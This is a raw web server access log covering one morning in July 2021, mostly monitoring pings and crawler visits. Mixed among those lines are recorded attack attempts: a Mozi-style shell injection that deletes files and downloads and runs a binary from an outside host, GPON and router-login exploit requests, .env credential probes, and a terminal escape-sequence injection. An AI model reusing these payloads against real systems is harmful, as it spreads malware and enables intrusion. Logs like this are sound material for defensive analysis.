39.106.182.149 - - [01/Jul/2021:05:07:27 +0200] "GET /html/public/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
39.106.182.149 - - [01/Jul/2021:05:07:27 +0200] "GET /public/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
39.106.182.149 - - [01/Jul/2021:05:07:28 +0200] "GET /TP/html/public/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
39.106.182.149 - - [01/Jul/2021:05:07:28 +0200] "GET /elrekt.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
39.106.182.149 - - [01/Jul/2021:05:07:29 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
39.106.182.149 - - [01/Jul/2021:05:07:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
45.129.56.200 - - [01/Jul/2021:05:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
54.67.86.130 - - [01/Jul/2021:05:18:39 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
165.227.52.194 - - [01/Jul/2021:05:25:36 +0200] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
165.227.52.194 - - [01/Jul/2021:05:25:40 +0200] "\xbf\xbf\xaf\xaf~" 501 320 "-" "-"
165.227.52.194 - - [01/Jul/2021:05:25:40 +0200] "POST / HTTP/1.1" 200 1229 "-" "WinHttpClient"
165.227.52.194 - - [01/Jul/2021:05:25:42 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
165.227.52.194 - - [01/Jul/2021:05:25:42 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
65.181.92.58 - - [01/Jul/2021:05:26:29 +0200] "GET /%1b%5d%32%3b%6f%77%6e%65%64%07%0a necho -en \"GET /\x1b]2;owned?\x07" 404 312 "-" "-"
54.67.38.72 - - [01/Jul/2021:05:31:00 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
13.52.216.44 - - [01/Jul/2021:05:34:09 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
196.196.41.68 - - [01/Jul/2021:05:34:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
136.144.41.178 - - [01/Jul/2021:05:37:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
209.90.225.218 - - [01/Jul/2021:05:39:10 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:05:39:26 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:05:40:12 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
119.179.239.194 - - [01/Jul/2021:05:42:34 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
172.104.138.223 - - [01/Jul/2021:05:45:57 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
209.90.225.218 - - [01/Jul/2021:05:53:12 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:05:57:06 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:05:57:21 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:06:00:46 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:06:01:00 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:06:01:05 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:06:01:11 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
190.11.32.208 - - [01/Jul/2021:06:10:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
190.11.32.208 - - [01/Jul/2021:06:10:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
190.11.32.208 - - [01/Jul/2021:06:11:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
162.142.125.39 - - [01/Jul/2021:06:16:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.39 - - [01/Jul/2021:06:16:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
42.227.45.212 - - [01/Jul/2021:06:21:22 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
84.17.59.69 - - [01/Jul/2021:06:25:35 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
84.17.59.69 - - [01/Jul/2021:06:25:36 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
163.53.83.248 - - [01/Jul/2021:06:37:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
46.101.36.46 - - [01/Jul/2021:06:38:10 +0200] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
46.101.36.46 - - [01/Jul/2021:06:38:13 +0200] "\xbf\xbf\xaf\xaf~" 501 320 "-" "-"
46.101.36.46 - - [01/Jul/2021:06:38:13 +0200] "POST / HTTP/1.1" 200 1229 "-" "WinHttpClient"
46.101.36.46 - - [01/Jul/2021:06:38:15 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
46.101.36.46 - - [01/Jul/2021:06:38:15 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
74.120.14.37 - - [01/Jul/2021:06:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
74.120.14.37 - - [01/Jul/2021:06:41:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.19.225.175 - - [01/Jul/2021:06:49:38 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.141.49.75 - - [01/Jul/2021:06:50:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
84.17.59.69 - - [01/Jul/2021:06:54:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
84.17.59.69 - - [01/Jul/2021:06:54:01 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2021:07:01:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:02:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:03:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:04:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:05:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.29.130.210 - - [01/Jul/2021:07:05:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Jul/2021:07:06:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:07:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:08:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.56 - - [01/Jul/2021:07:08:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.56 - - [01/Jul/2021:07:08:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
138.99.65.69 - - [01/Jul/2021:07:08:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jul/2021:07:09:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:10:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.189.182.234 - - [01/Jul/2021:07:10:41 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2021:07:11:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:12:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:13:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:14:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:15:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:16:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:17:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:18:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:19:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:20:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.87.43.130 - - [01/Jul/2021:07:20:22 +0200] "GET /api.php?key=1 HTTP/1.1" 404 312 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
186.33.116.206 - - [01/Jul/2021:07:20:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jul/2021:07:21:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:22:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.19.225.175 - - [01/Jul/2021:07:22:49 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Jul/2021:07:23:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:24:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:25:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.235.64.222 - - [01/Jul/2021:07:25:17 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
93.174.95.106 - - [01/Jul/2021:07:25:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
93.174.95.106 - - [01/Jul/2021:07:25:54 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
93.174.95.106 - - [01/Jul/2021:07:25:54 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
93.174.95.106 - - [01/Jul/2021:07:25:54 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
93.174.95.106 - - [01/Jul/2021:07:25:56 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
212.91.246.72 - - [01/Jul/2021:07:26:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.79.107.251 - - [01/Jul/2021:07:26:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
212.91.246.72 - - [01/Jul/2021:07:27:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.86.102.106 - - [01/Jul/2021:07:27:31 +0200] "GET / HTTP/1.0" 200 1229 "http://www.bmt-it.de/" "Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
212.91.246.72 - - [01/Jul/2021:07:28:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:29:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:30:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.17.59.69 - - [01/Jul/2021:07:30:24 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
84.17.59.69 - - [01/Jul/2021:07:30:25 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2021:07:31:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:32:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:33:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:34:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:35:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:36:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:37:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:38:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:39:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.189.182.234 - - [01/Jul/2021:07:39:35 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2021:07:40:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:41:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:42:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:43:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.142.236.40 - - [01/Jul/2021:07:43:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.40 - - [01/Jul/2021:07:43:30 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.40 - - [01/Jul/2021:07:43:30 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.40 - - [01/Jul/2021:07:43:32 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.40 - - [01/Jul/2021:07:43:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
34.78.120.99 - - [01/Jul/2021:07:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
212.91.246.72 - - [01/Jul/2021:07:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.79.107.251 - - [01/Jul/2021:07:44:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
212.91.246.72 - - [01/Jul/2021:07:45:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:46:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:47:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:48:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:49:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:50:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.153.86.70 - - [01/Jul/2021:07:50:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Jul/2021:07:51:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:52:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:53:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:54:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:55:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:56:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.189.182.234 - - [01/Jul/2021:07:56:41 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2021:07:57:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:58:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:07:59:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:00:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:01:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:02:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:03:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:04:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:05:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.37 - - [01/Jul/2021:08:05:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.37 - - [01/Jul/2021:08:05:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jul/2021:08:06:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.17.59.69 - - [01/Jul/2021:08:07:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
84.17.59.69 - - [01/Jul/2021:08:07:44 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2021:08:08:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
39.67.205.99 - - [01/Jul/2021:08:08:27 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://39.67.205.99:60549/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.246.72 - - [01/Jul/2021:08:09:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:10:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:11:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:12:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.129.64.163 - - [01/Jul/2021:08:12:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
212.91.246.72 - - [01/Jul/2021:08:13:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.19.225.175 - - [01/Jul/2021:08:13:54 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Jul/2021:08:14:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:15:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.247.252 - - [01/Jul/2021:08:15:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
